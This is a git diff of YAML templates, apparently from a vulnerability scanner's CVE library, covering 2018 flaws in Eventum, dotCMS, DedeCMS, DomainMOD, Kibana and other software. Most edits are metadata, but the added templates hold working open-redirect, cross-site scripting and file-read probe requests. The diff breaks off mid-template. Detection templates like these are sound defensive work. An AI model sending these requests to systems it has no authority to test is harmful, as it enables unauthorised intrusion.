   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.5
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
     cve-id: CVE-2018-16716
     cwe-id: CWE-22
   tags: cve,cve2018,ncbi,lfi
@@ -30,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/18
diff --git a/cves/2018/CVE-2018-16761.yaml b/cves/2018/CVE-2018-16761.yaml
new file mode 100644
index 0000000000..ec40ee117f
--- /dev/null
+++ b/cves/2018/CVE-2018-16761.yaml
@@ -0,0 +1,32 @@
+id: CVE-2018-16761
+
+info:
+  name: Eventum v3.3.4 - Open Redirect
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    Eventum before 3.4.0 has an open redirect vulnerability.
+  reference:
+    - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/
+    - https://github.com/eventum/eventum/
+    - https://www.cvedetails.com/cve/CVE-2018-16761/
+    - https://github.com/eventum/eventum/releases/tag/v3.4.0
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-16761
+    cwe-id: CWE-601
+  tags: cve,cve2018,redirect,eventum,oss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/select_project.php?url=http://interact.sh'
+      - '{{BaseURL}}/clock_status.php?current_page=http://interact.sh'
+
+    stop-at-first-match: true
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml
index d12fec7ba7..a909a8ad58 100644
--- a/cves/2018/CVE-2018-16763.yaml
+++ b/cves/2018/CVE-2018-16763.yaml
@@ -11,11 +11,11 @@ info:
     - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
     - https://nvd.nist.gov/vuln/detail/CVE-2018-16763
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-16763
     cwe-id: CWE-74
-  tags: cve,cve2018,fuelcms,rce
+  tags: cve,cve2018,fuelcms,rce,edb
 
 requests:
   - raw:
diff --git a/cves/2018/CVE-2018-16836.yaml b/cves/2018/CVE-2018-16836.yaml
index 6557b09070..259bf3e4f2 100644
--- a/cves/2018/CVE-2018-16836.yaml
+++ b/cves/2018/CVE-2018-16836.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/45385
     - https://nvd.nist.gov/vuln/detail/CVE-2018-16836
+    - https://github.com/maroueneboubakri/CVE/tree/master/rubedo-cms
+    - https://www.exploit-db.com/exploits/45385/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-16836
     cwe-id: CWE-22
-  tags: cve,cve2018,rubedo,lfi
+  tags: cve,cve2018,rubedo,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-17246.yaml b/cves/2018/CVE-2018-17246.yaml
index 8a33e82710..a00e5bbc31 100644
--- a/cves/2018/CVE-2018-17246.yaml
+++ b/cves/2018/CVE-2018-17246.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
     - https://nvd.nist.gov/vuln/detail/CVE-2018-17246
+    - https://www.elastic.co/community/security
+    - https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-17246
     cwe-id: CWE-829
-  tags: cve,cve2018,lfi,kibana
+  tags: cve,cve2018,lfi,kibana,vulhub
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml
index 348c3260bf..edbb1e3ff7 100644
--- a/cves/2018/CVE-2018-17254.yaml
+++ b/cves/2018/CVE-2018-17254.yaml
@@ -14,7 +14,7 @@ info:
     cve-id: CVE-2018-17254
     cwe-id: CWE-89
   remediation: Update or remove the affected plugin.
-  tags: joomla,sqli,cve,cve2018
+  tags: cve,cve2018,packetstorm,edb,joomla,sqli
 
 requests:
   - raw:
diff --git a/cves/2018/CVE-2018-17422.yaml b/cves/2018/CVE-2018-17422.yaml
new file mode 100644
index 0000000000..02d8bd123f
--- /dev/null
+++ b/cves/2018/CVE-2018-17422.yaml
@@ -0,0 +1,39 @@
+id: CVE-2018-17422
+
+info:
+  name: dotCMS < 5.0.2 - Open Redirect
+  author: 0x_Akoko,daffainfo
+  severity: medium
+  description: |
+    dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter.
+  reference:
+    - https://github.com/dotCMS/core/issues/15286
+    - https://www.cvedetails.com/cve/CVE-2018-17422
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-17422
+    cwe-id: CWE-601
+  metadata:
+    shodan-query: http.title:"dotCMS"
+    verified: "true"
+  tags: cve,cve2018,redirect,dotcms
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
+      - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "self.location = 'http://www.interact.sh'"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2018/CVE-2018-17431.yaml b/cves/2018/CVE-2018-17431.yaml
index ae4fdebaa3..b9b6edfa04 100644
--- a/cves/2018/CVE-2018-17431.yaml
+++ b/cves/2018/CVE-2018-17431.yaml
@@ -9,12 +9,13 @@ info:
     - https://www.exploit-db.com/exploits/48825
     - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
     - https://nvd.nist.gov/vuln/detail/CVE-2018-17431
+    - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-17431
     cwe-id: CWE-287
-  tags: cve,cve2018,comodo,rce
+  tags: cve2018,comodo,rce,edb,cve
 
 requests:
   - raw:
diff --git a/cves/2018/CVE-2018-18264.yaml b/cves/2018/CVE-2018-18264.yaml
index 99cfd8d3d5..98c3b36c2f 100644
--- a/cves/2018/CVE-2018-18264.yaml
+++ b/cves/2018/CVE-2018-18264.yaml
@@ -1,14 +1,16 @@
 id: CVE-2018-18264
 
 info:
-  name: Kubernetes Dashboard unauthenticated secret access
+  name: Kubernetes Dashboard <1.10.1 - Authentication Bypass
   author: edoardottt
   severity: high
-  description: Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.
+  description: |
+    Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-18264
     - https://github.com/kubernetes/dashboard/pull/3289
     - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/
+    - https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-18264
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -16,7 +18,7 @@ info:
     cwe-id: CWE-306
   metadata:
     shodan-query: product:"Kubernetes"
-  tags: cve,cve2018,kubernetes,k8s,unauth
+  tags: cve,cve2018,kubernetes,k8s,auth-bypass
 
 requests:
   - method: GET
@@ -27,10 +29,12 @@ requests:
     stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
 
       - type: dsl
         dsl:
-          - 'contains(body, "apiVersion") && contains(body, "objectRef")'
\ No newline at end of file
+          - 'contains(body, "apiVersion") && contains(body, "objectRef")'
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/06/13
diff --git a/cves/2018/CVE-2018-18323.yaml b/cves/2018/CVE-2018-18323.yaml
index b1bf6658a8..c2584cfb97 100644
--- a/cves/2018/CVE-2018-18323.yaml
+++ b/cves/2018/CVE-2018-18323.yaml
@@ -1,20 +1,23 @@
 id: CVE-2018-18323
 
 info:
-  name: Centos Web Panel 0.9.8.480 LFI
+  name: Centos Web Panel 0.9.8.480 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Centos Web Panel version 0.9.8.480 suffers from code execution, cross site scripting, and local file inclusion vulnerabilities.
+  description: |
+    Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version.
   reference:
     - https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html
     - http://centos-webpanel.com/
     - https://www.cvedetails.com/cve/CVE-2018-18323
+    - https://seccops.com/centos-web-panel-0-9-8-480-multiple-vulnerabilities/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-18323
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-18323
     cwe-id: CWE-22
-  tags: cve,cve2018,centos,lfi
+  tags: cve,cve2018,centos,lfi,packetstorm
 
 requests:
   - method: GET
@@ -31,3 +34,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2018/CVE-2018-18570.yaml b/cves/2018/CVE-2018-18570.yaml
index dc4cb72724..f95c943a69 100644
--- a/cves/2018/CVE-2018-18570.yaml
+++ b/cves/2018/CVE-2018-18570.yaml
@@ -1,10 +1,10 @@
 id: CVE-2018-18570
 
 info:
-  name: Cross-Site Scripting on Planon web application
+  name: Planon <Live Build 41 - Cross-Site Scripting
   author: emadshanab
   severity: medium
-  description: Planon before Live Build 41 has XSS
+  description: Planon before Live Build 41 is vulnerable to cross-site scripting.
   reference:
     - https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html
     - https://nvd.nist.gov/vuln/detail/CVE-2018-18570
@@ -35,3 +35,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-18608.yaml b/cves/2018/CVE-2018-18608.yaml
new file mode 100644
index 0000000000..c5b0ac561d
--- /dev/null
+++ b/cves/2018/CVE-2018-18608.yaml
@@ -0,0 +1,46 @@
+id: CVE-2018-18608
+
+info:
+  name: DedeCMS 5.7 SP2 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php.
+  reference:
+    - https://github.com/ky-j/dedecms/issues/8
+    - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-18608
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-18608
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"DedeCms"
+    verified: "true"
+  tags: dedecms,xss,cve,cve2018
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "'><script>alert(document.domain)</script>"
+          - "DedeCMS Error Warning!"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-18775.yaml b/cves/2018/CVE-2018-18775.yaml
index fccd6337af..c796734f46 100644
--- a/cves/2018/CVE-2018-18775.yaml
+++ b/cves/2018/CVE-2018-18775.yaml
@@ -1,18 +1,20 @@
 id: CVE-2018-18775
 
 info:
-  name: Cross Site Scripting in Microstrategy Web version 7
+  name: Microstrategy Web 7 - Cross-Site Scripting
   author: 0x_Akoko
   severity: medium
-  description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter
+  description: Microstrategy Web 7 does not sufficiently encode user-controlled inputs, resulting in cross-site scripting via the Login.asp Msg parameter.
   reference:
     - https://www.exploit-db.com/exploits/45755
+    - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-18775
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2018-18775
     cwe-id: CWE-79
-  tags: cve,cve2018,microstrategy,xss
+  tags: cve2018,microstrategy,xss,edb,packetstorm,cve
 
 requests:
   - method: GET
@@ -33,3 +35,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2018/CVE-2018-18777.yaml b/cves/2018/CVE-2018-18777.yaml
index 3a27937e54..bd8f749507 100644
--- a/cves/2018/CVE-2018-18777.yaml
+++ b/cves/2018/CVE-2018-18777.yaml
@@ -1,21 +1,21 @@
 id: CVE-2018-18777
 
 info:
-  name: Path traversal vulnerability in Microstrategy Web version 7
+  name: Microstrategy Web 7 - Local File Inclusion
   author: 0x_Akoko
   severity: medium
   description: |
-    Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage)
-    allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /..
-    (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.
+    Microstrategy Web 7 is vulnerable to local file inclusion via "/WebMstr7/servlet/mstrWeb" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.
   reference:
     - https://www.exploit-db.com/exploits/45755
+    - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-18777
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 4.3
     cve-id: CVE-2018-18777
     cwe-id: CWE-22
-  tags: cve,cve2018,microstrategy,lfi,traversal
+  tags: traversal,edb,packetstorm,cve,cve2018,microstrategy,lfi
 
 requests:
   - method: GET
@@ -32,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2018/CVE-2018-18778.yaml b/cves/2018/CVE-2018-18778.yaml
index 72df6a4842..8d2d9a7575 100644
--- a/cves/2018/CVE-2018-18778.yaml
+++ b/cves/2018/CVE-2018-18778.yaml
@@ -1,18 +1,20 @@
 id: CVE-2018-18778
 
 info:
-  name: mini_httpd Path Traversal
+  name: ACME mini_httpd <1.30 - Local File Inclusion
   author: dhiyaneshDK
   severity: medium
-  description: ACME mini_httpd before 1.30 lets remote users read arbitrary files.
+  description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion.
   reference:
     - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
+    - http://www.acme.com/software/mini_httpd/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-18778
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 6.5
     cve-id: CVE-2018-18778
     cwe-id: CWE-200
-  tags: cve,cve2018,lfi
+  tags: cve,cve2018,lfi,mini_httpd
 
 requests:
   - raw:
@@ -30,3 +32,5 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2018/CVE-2018-18925.yaml b/cves/2018/CVE-2018-18925.yaml
index cff6c60e67..157abc0446 100644
--- a/cves/2018/CVE-2018-18925.yaml
+++ b/cves/2018/CVE-2018-18925.yaml
@@ -9,13 +9,14 @@ info:
     - https://www.anquanke.com/post/id/163575
     - https://github.com/vulhub/vulhub/tree/master/gogs/CVE-2018-18925
     - https://nvd.nist.gov/vuln/detail/cve-2018-18925
+    - https://github.com/gogs/gogs/issues/5469
+  remediation: This issue will be fixed by updating to the latest version of Gogs.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-18925
     cwe-id: CWE-384
-  remediation: This issue will be fixed by updating to the latest version of Gogs.
-  tags: cve,cve2018,gogs,lfi,rce
+  tags: gogs,lfi,rce,vulhub,cve,cve2018
 
 requests:
   - raw:
diff --git a/cves/2018/CVE-2018-19136.yaml b/cves/2018/CVE-2018-19136.yaml
new file mode 100644
index 0000000000..8f624d51b4
--- /dev/null
+++ b/cves/2018/CVE-2018-19136.yaml
@@ -0,0 +1,52 @@
+id: CVE-2018-19136
+
+info:
+  name: DomainMOD 4.11.01 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php.
+  reference:
+    - https://www.exploit-db.com/exploits/45883/
+    - https://github.com/domainmod/domainmod/issues/79
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19136
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-19136
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: edb,cve,cve2018,domainmod,xss,authenticated
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+
+      - |
+        GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><script>alert(document.domain)</script>&really_del=1">YES'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-19137.yaml b/cves/2018/CVE-2018-19137.yaml
new file mode 100644
index 0000000000..dba405de69
--- /dev/null
+++ b/cves/2018/CVE-2018-19137.yaml
@@ -0,0 +1,51 @@
+id: CVE-2018-19137
+
+info:
+  name: DomainMOD 4.11.01 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php.
+  reference:
+    - https://github.com/domainmod/domainmod/issues/79
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19137
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-19137
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2018,domainmod,xss,authenticated
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+
+      - |
+        GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>&really_del'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-19326.yaml b/cves/2018/CVE-2018-19326.yaml
index 934c8ab815..6ca88c667c 100644
--- a/cves/2018/CVE-2018-19326.yaml
+++ b/cves/2018/CVE-2018-19326.yaml
@@ -1,14 +1,17 @@
 id: CVE-2018-19326
 
 info:
-  name: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
+  name: Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: The vulnerability exists due to path traversal, as demonstrated by reading /etc/passwd. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attack and view arbitrary files.
+  description: |
+    Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attacks, and view arbitrary files.
   reference:
     - https://www.exploit-db.com/exploits/45904
     - https://www.cybersecurity-help.cz/vdb/SB2018120309
     - https://www.zyxel.com/homepage.shtml
+    - https://gist.github.com/numanturle/4988b5583e5ebe501059bd368636de33
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19326
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -17,7 +20,7 @@ info:
   metadata:
     verified: true
     shodan-query: http.html:"VMG1312-B10D"
-  tags: cve,cve2018,zyxel,lfi,modem,router
+  tags: lfi,modem,router,edb,cve,cve2018,zyxel
 
 requests:
   - method: GET
@@ -35,3 +38,5 @@ requests:
         part: header
         words:
           - "application/octet-stream"
+
+# Enhanced by mp on 2022/06/13
diff --git a/cves/2018/CVE-2018-19365.yaml b/cves/2018/CVE-2018-19365.yaml
index bd21264fb8..b27127cfd2 100644
--- a/cves/2018/CVE-2018-19365.yaml
+++ b/cves/2018/CVE-2018-19365.yaml
@@ -8,8 +8,9 @@ info:
   reference:
     - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
     - https://www.cvedetails.com/cve/CVE-2018-19365
+    - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-19365
     cwe-id: CWE-22
diff --git a/cves/2018/CVE-2018-19386.yaml b/cves/2018/CVE-2018-19386.yaml
index d25228097e..2fbe11a15f 100644
--- a/cves/2018/CVE-2018-19386.yaml
+++ b/cves/2018/CVE-2018-19386.yaml
@@ -1,13 +1,15 @@
 id: CVE-2018-19386
 
 info:
-  name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
+  name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button
-    on the page, aka a /iwc/idcStateError.iwc?page= URI.
+  description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
   reference:
     - https://www.cvedetails.com/cve/CVE-2018-19386/
+    - https://i.imgur.com/Y7t2AD6.png
+    - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19386
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -27,4 +29,6 @@ requests:
           - 200
       - type: word
         words:
-          - '<a href="javascript:alert(document.domain)//'
\ No newline at end of file
+          - '<a href="javascript:alert(document.domain)//'
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19439.yaml b/cves/2018/CVE-2018-19439.yaml
index d95e49bf11..44d6518582 100644
--- a/cves/2018/CVE-2018-19439.yaml
+++ b/cves/2018/CVE-2018-19439.yaml
@@ -1,20 +1,22 @@
 id: CVE-2018-19439
 
 info:
-  name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
+  name: Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting
   author: madrobot,dwisiswant0
   severity: medium
-  description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
+  description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.
   reference:
-    - http://www.securityfocus.com/bid/106006
-    - http://seclists.org/fulldisclosure/2018/Nov/58
+    - http://web.archive.org/web/20210124221313/https://www.securityfocus.com/bid/106006/
     - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19439
+    - http://seclists.org/fulldisclosure/2018/Nov/58
+  remediation: Fixed in later versions including 5.4.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2018-19439
     cwe-id: CWE-79
-  tags: cve,cve2018,oracle,xss
+  tags: oracle,xss,seclists,packetstorm,cve,cve2018
 
 requests:
   - method: GET
@@ -25,3 +27,5 @@ requests:
         words:
           - "<script>alert(1337)</script><!--</TITLE>"
         part: body
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2018/CVE-2018-19458.yaml b/cves/2018/CVE-2018-19458.yaml
index 5f5550804f..f815a04a94 100644
--- a/cves/2018/CVE-2018-19458.yaml
+++ b/cves/2018/CVE-2018-19458.yaml
@@ -4,16 +4,19 @@ info:
   name: PHP Proxy 3.0.3 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246.
+  description: |
+    PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246).
   reference:
     - https://www.exploit-db.com/exploits/45780
     - https://www.cvedetails.com/cve/CVE-2018-19458
+    - https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19458
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-19458
     cwe-id: CWE-287
-  tags: cve,cve2018,lfi,proxy
+  tags: edb,cve,cve2018,lfi,proxy
 
 requests:
   - method: GET
@@ -30,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/13
diff --git a/cves/2018/CVE-2018-19749.yaml b/cves/2018/CVE-2018-19749.yaml
new file mode 100644
index 0000000000..cf27fb7f4d
--- /dev/null
+++ b/cves/2018/CVE-2018-19749.yaml
@@ -0,0 +1,54 @@
+id: CVE-2018-19749
+
+info:
+  name: DomainMOD 4.11.01 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field.
+  reference:
+    - https://github.com/domainmod/domainmod/issues/81
+    - https://www.exploit-db.com/exploits/45941/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19749
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2018-19749
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2018,domainmod,xss,authenticated,edb
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+
+      - |
+        POST /assets/add/account-owner.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
